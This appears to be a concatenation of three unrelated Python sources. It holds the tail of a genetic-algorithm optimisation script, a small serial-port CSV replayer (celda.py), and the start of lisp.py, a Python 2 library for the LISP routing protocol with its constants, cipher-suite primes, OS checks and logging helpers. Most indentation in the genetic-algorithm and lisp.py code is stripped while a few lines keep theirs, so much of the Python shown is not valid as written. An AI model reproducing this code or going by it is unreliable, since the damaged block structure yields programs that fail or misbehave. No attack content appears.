def initPop(self,tamPop):
for i in range(0,tamPop):
self.population.append(ind())
def evaluateAll(self):
for ind in self.population:
ind.fit=fitness(ind)
    def getBest(self):
        # argmax over the fitness values, not over the individual objects
        return self.population[np.argmax([i.fit for i in self.population])]
# Mutation method. The mutation can be vectorial or absolute.
def mutate(indiv):
global taxaMut,chanceMut
if random.random()<vectorialMutationChance:
vec=ind().cromo.freqFactor
        amp = np.sqrt(sum(pow(i, 2) for i in vec.A1))  # builtin sum: np.sum over a generator is deprecated
vec/=amp
vec*=taxaMut*random.random()
indiv.cromo.freqFactor+=vec
indiv.marker='vectorial'
# for line in indiv.cromo.freqFactor:
# for i in range(0,len(np.array(line)[0])):
# if random.random()*1000<chanceMut:
# line[0,i]+=mut*random.random()
else:
for line in indiv.cromo.freqFactor:
for i in range(0,len(np.array(line)[0])):
if random.random()*10000<chanceMut:
if random.random()<0.5:
mut = taxaMut
else:
mut = -taxaMut
line[0,i]+=mut*random.random()
indiv.marker='absolute'
# Crossover by adding the parents' chromosomes and dividing by the number of
# parents
def meanCrossover(pais):
filho= ind()
somaFreqs = sum([pai.cromo.freqFactor for pai in pais])
tam= len(pais)
filho.cromo.freqFactor=somaFreqs/tam
mutate(filho)
filho.marker+=' meaned '
return filho
# Crossover by replacing each of the son's genes with either the mother's or
# the father's, with 50% chance
def binaryCrossover(pais):
filho=ind()
for i in range(0,len(filho.cromo.freqFactor)):
for j in range(0,len(filho.cromo.freqFactor[0].A1)):
if random.random()<0.5:
filho.cromo.freqFactor[i,j]=pais[0].cromo.freqFactor[i,j]
else:
filho.cromo.freqFactor[i,j]=pais[1].cromo.freqFactor[i,j]
mutate(filho)
filho.marker+=' binerized '
return filho
# Mixed crossover
def weightedCrossover(pais):
if random.random()<binaryCrossChance:
return binaryCrossover(pais)
else:
return meanCrossover(pais)
# Tournament. Returns the best fitted individual
def torneio(pop):
bestIndiv=pop.population[0]
for indiv in pop.population:
if indiv.fit>=bestIndiv.fit:
bestIndiv=indiv
return bestIndiv
# Generate a new population by crossing the best individual with the remainder
# of the population
def genNewPop(best,pop):
newpop=population()
for indiv in pop.population:
if indiv == best:
newpop.population.append(indiv)
continue
else:
temp=weightedCrossover([best,indiv])
newpop.population.append(temp)
return newpop
# Remove the n least-fit individuals, replacing them with new random ones
def removeSuckers(pop,n):
def getFit(indiv):
return indiv.fit
pop.population.sort(reverse=False,key=getFit)
for i in range(0,n):
pop.population[i]=ind()
# Returns the mean fitness of the population in pop
def getPopMean(pop):
temp=0.0
tam=len(pop.population)
for indiv in pop.population:
temp+=indiv.fit
return temp/tam
# Not used. Divides every chromosome of a population by the largest absolute
# value it contains
def normalizePop(pop):
for indiv in pop.population:
maxF=0
for line in indiv.cromo.freqFactor:
for i in range(0,len(np.array(line)[0])):
if abs(line[0,i]) > maxF:
maxF=abs(line[0,i])
for line in indiv.cromo.freqFactor:
for i in range(0,len(np.array(line)[0])):
line[0,i]/=maxF
# Plot a graph
def plotGens(best,mean):
plt.plot(best,'go')
plt.plot(mean,'b-')
# Class for controlling the GA variables
class populationControl():
global tamPop,\
taxaMut,\
chanceMut,\
bestAll,\
bias,\
maxGen,\
tamPop,\
taxaMut,\
taxaMutMax,\
chanceMut,\
continuous,\
binaryFit,\
multFac,\
binaryCrossChance,\
taxaMutMult,\
taxaMutMin
def __init__(self):
self._tamPop=tamPop
self._taxaMut=taxaMut
self._chanceMut=chanceMut
self._bias=bias
self._maxGen=maxGen
self._tamPop=tamPop
self._taxaMutMin=taxaMutMin
self._taxaMutMax=taxaMutMax
self._chanceMut=chanceMut
self._continuous=continuous
self._binaryFit=binaryFit
self._multFac=multFac
self._binaryCrossChance=binaryCrossChance
self._taxaMutMult=taxaMutMult
self._counter=0
self._expansion=False
def control(self,gen,counter,best,last):
global taxaMut
# taxaMut=self._taxaMutMax
ascendingCounter=0
if gen>25:
            if best.fit <= last.fit * 1.001:  # If the fitness doesn't grow by 0.1%
self._counter+=1
else:
# taxaMut=self._taxaMut
chanceMut=self._chanceMut
self._expansion=False
self._counter=0
ascendingCounter=0
        if self._counter == 8:  # If the fitness doesn't grow for n generations
            if self._expansion:  # If taxaMut is increasing
                if taxaMut < self._taxaMutMax:  # If taxaMut is below the maximum
                    taxaMut *= self._taxaMutMult
                else:  # Once taxaMut passes the maximum, start shrinking it
                    self._expansion = False
            else:  # If taxaMut is decreasing
                if taxaMut > self._taxaMutMin:  # If it is above the minimum
                    taxaMut /= self._taxaMutMult
                else:  # Once it drops below the minimum, start growing it
                    self._expansion = True
self._counter=0
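# Illustrative trace of populationControl.control() (values assumed, not from
# a real run): with taxaMutMult = 2, taxaMutMin = 0.01 and taxaMutMax = 1.0,
# eight stagnant generations halve taxaMut (1.0 -> 0.5 -> ... -> 0.01); once
# it drops below the minimum, _expansion flips and subsequent stagnation
# periods double it back up, so the mutation rate sweeps between the bounds
# until the fitness improves again.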
def main():
global maxFreq,\
freqStep,\
tamPop,\
taxaMut,\
chanceMut,\
nArq,\
bestAll,\
startOver,\
bestTypes
gen=0
counter=0
last=ind()
bestVec=[]
meanVec=[]
taxaVec=[]
taxaMut=taxaMutMax
# plotter=dataPlotter.dataPlotter('Geracao','Melhor de Todos',bestVec)
# threading.Thread(target=plotter.start).start()
controller=populationControl()
readArqs(sourceType)
if sourceType=='bioplux':
nArq=len(getArqs())
elif sourceType=='ninapro':
nArq=len(real)
if startOver:
pop = population()
pop.initPop(tamPop)
else:
pop=bestAll
while gen<maxGen:
gen+=1
pop.evaluateAll()
best=torneio(pop)
if not last.uid==best.uid:
bestTypes.append(best.marker)
print(gen,best.fit,':',best.marker,tamPop,taxaMut,chanceMut,maxGen)#,':', [p.fit for p in population]
pop=genNewPop(best,pop)
###########################################################################
controller.control(gen,counter,best,last)
last=best
taxaVec.append(20*np.log(taxaMut))
bestVec.append(last.fit)
meanVec.append(getPopMean(pop))
###########################################################################
# createSuckers(pop.tamPop/3)
removeSuckers(pop,tamPop/5)
# normalizePop(pop)
plotGens(bestVec,meanVec)
plotGens(bestVec,taxaVec)
pop.evaluateAll()
print([p.fit for p in pop.population])
return pop
bestAll=main()
|
celda.py
|
import serial
import argparse
import time
import csv
from threading import Thread
def main():
    # Replay each CSV row over the serial port, one line every 0.4 s.
    with open('celda.csv') as csv_file:
        ser = serial.Serial(port)
        csv_reader = csv.reader(csv_file)
        for row in csv_reader:
            time.sleep(0.4)
            ser.write((row[0] + "\n").encode())
parser = argparse.ArgumentParser(description="Simulates a load-cell data stream over a serial port")
parser.add_argument('--port', action='store', help='Serial port to stream to', required=True, dest='port')
port = parser.parse_args().port
t1 = Thread(target=main, daemon=True)
t1.start()
# Keep the main thread alive; as a daemon, t1 dies when the process exits.
while t1.is_alive():
    time.sleep(0.1)
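# Example invocation (the device path is illustrative; a virtual serial pair
# can be created on Linux with e.g. `socat -d -d pty,raw,echo=0 pty,raw,echo=0`):
#
#   python celda.py --port /dev/ttyUSB0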
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. The first dictionary array is indexed by device name
# and the second one has value lisp_interface() indexed by an instance-id
# string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time the g, p, and public-key values are created. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, that we write specific information
# to say a Broadcom chip, that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
lisp_default_secondary_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# hostname that is sent in a Info-Request is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests. When the process
# starts up or the map-cache is cleared by user we don't do rate-limiting for
# 1 minute so we can load up the cache quicker.
#
lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time.time()
#
# Used for doing global rate-limiting of ICMP Too Big messages.
#
lisp_last_icmp_too_big_sent = 0
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll hash the first long of an ICMP echo-request and
# echo-reply for testing purposes, to show per-packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is indexed by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# a EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends is
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
lisp_ms_json_keys = {}
#
# Used to store NAT translated address state in an RTR when an ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error processing called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# sits behind a NAT device.
#
# Dictionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "group-prefix", "rloc-prefix", and
# "instance-id". If keywords are not in dictionary array, the value is
# wildcarded. The values eid-prefix, group-prefix and rloc-prefix is
# lisp_address() so longest match lookups can be performed. The instance-id
# value is an array of 2 elements that store same value in both elements if
# not a range or the low and high range values.
#
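# A hypothetical entry, shown doctest-style like the examples elsewhere in
# this file (the prefixes and IID are illustrative; real entries store
# lisp_address() objects rather than the strings shown here):
#
# >>> lisp_glean_mappings.append({ "eid-prefix" : "10.0.0.0/8",
# ... "rloc-prefix" : "192.168.1.0/24", "instance-id" : [1539, 1539] })
#
# An instance-id of [1539, 1539] means the single IID 1539; [1000, 2000]
# would match any IID in that range.
#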
lisp_glean_mappings = []
#
# Gleaned groups data structure. Used to find all (S,G) and (*,G) the gleaned
# EID has joined. This data structure will be used to time out entries that
# have stopped joining. In which case, the RLE is removed from the (S,G) or
# (*,G) that join timed out.
#
# The dictionary array is indexed by "[<iid>]<eid>" and the value field is a
# dictionary array indexed by group address string. The value of the nested
# dictionary array is a timestamp. When EID 1.1.1.1 has joined groups 224.1.1.1,
# and 224.2.2.2, here is how timestamp 1111 and 2222 are stored.
#
# >>> lisp_gleaned_groups = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"] = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.1.1.1"] = 1111
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.2.2.2"] = 2222
# >>> lisp_gleaned_groups
# {'[1539]1.1.1.1': {'224.2.2.2': 2222, '224.1.1.1': 1111}}
#
lisp_gleaned_groups = {}
#
# Use this socket for all ICMP Too-Big messages sent by any process. We are
# centralizing it here.
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_ICMP)
lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
#endif
lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_TEST_MR_INTERVAL = 60 # In units of seconds, 1 minute
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = .5 # In units of seconds, 500 ms
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60 # In units of seconds, 1 minute
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180 # In units of seconds, 3 minutes
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (platform.dist()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian_kali
#
# Return True if this system is running Kali Linux.
#
def lisp_is_debian_kali():
return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Alpine Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this is a ubuntu or fedora system.
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
vm = commands.getoutput("sudo dmidecode -s bios-vendor")
if (vm.find("command not found") != -1 and lisp_on_docker()):
aws = bold("AWS check", False)
lprint("{} - dmidecode not installed in docker container".format(aws))
#endif
return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
vm = commands.getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("google") != -1)
#enddef
#
# lisp_on_docker
#
# Are we in a docker container?
#
def lisp_on_docker():
return(os.path.exists("/.dockerenv"))
#enddef
#
# lisp_process_logfile
#
# Check to see if the logfile exists. If not, either it is startup time and we
# need to create one, or another procedure rotated the file out of the
# directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# print() and log output with the component name.
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed. If "force" is among the
# arguments, the lisp_debug_logging setting is ignored and the log message is
# issued regardless.
#
def lprint(*args):
force = ("force" in args)
if (lisp_debug_logging == False and force == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print "{}: {}:".format(ts, lisp_log_id),
for arg in args:
if (arg == "force"): continue
print arg,
#endfor
print ""
try: sys.stdout.flush()
except: pass
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# debug
#
# Used for debugging, to find the location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
